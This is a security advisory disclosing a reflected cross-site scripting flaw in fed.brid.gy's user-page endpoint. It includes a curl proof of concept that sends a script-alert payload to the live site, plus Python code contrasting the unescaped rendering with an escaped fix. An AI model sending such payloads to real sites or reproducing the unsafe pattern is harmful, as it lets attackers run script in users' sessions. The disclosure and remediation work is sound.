Summary
fed.brid.gy's search is vulnerable to XSS.
Details
It looks like the fed.brid.gy code implicitly trusts the value of 'id' in several places and includes it unescaped in rendered responses, including the "Couldn't determine network" error message:
https://github.com/search?q=repo%3Asnarfed%2Fbridgy-fed%20Couldn%27t%20determine%20network&type=code
PoC
$ curl 'https://fed.brid.gy/user-page' --data-raw 'id=%3Cscript%3Ealert%281%29%3C%2Fscript%3E' | grep alert
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 3052 100 3010 100 42 9477 132 --:--:-- --:--:-- --:--:-- 9627
Couldn't determine network for <script>alert(1)</script>.
Impact
Getting a user to click a link that triggers a POST to https://fed.brid.gy/user-page with an attacker-controlled 'id' results in JavaScript executing in the origin of fed.brid.gy.
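The pattern behind this report, as an added illustration that is not bridgy-fed's own code: the request-controlled 'id' interpolated into the error message verbatim, next to the same message with HTML escaping applied, plus a small regression check that flags a body reflecting raw markup. Function names and the template string's exact shape are assumptions.

```python
import html

# Assumed shape of the message seen in the PoC output.
ERROR_TEMPLATE = "Couldn't determine network for {id}."


def render_error_unsafe(user_id: str) -> str:
    # Vulnerable pattern: the user-supplied value is placed into HTML as-is,
    # so any tags it contains become part of the page.
    return ERROR_TEMPLATE.format(id=user_id)


def render_error_safe(user_id: str) -> str:
    # Fix: escape before the value reaches the response body.
    # quote=True also escapes ' and " so the value is inert inside attributes too.
    return ERROR_TEMPLATE.format(id=html.escape(user_id, quote=True))


def reflects_raw_markup(body: str, user_input: str) -> bool:
    """Regression check: True if input containing markup characters appears
    in the response body unchanged, i.e. without being escaped."""
    has_markup = any(ch in user_input for ch in "<>\"'&")
    return has_markup and user_input in body


# Constructed input: the advisory's PoC 'id' after URL-decoding.
POC_ID = "<script>alert(1)</script>"

if __name__ == "__main__":
    print("unsafe:", render_error_unsafe(POC_ID))
    print("safe:  ", render_error_safe(POC_ID))
```

In a Jinja2/Flask app the same result comes from leaving autoescaping on and never wrapping request values in Markup; the explicit escape above is the equivalent for strings built by hand.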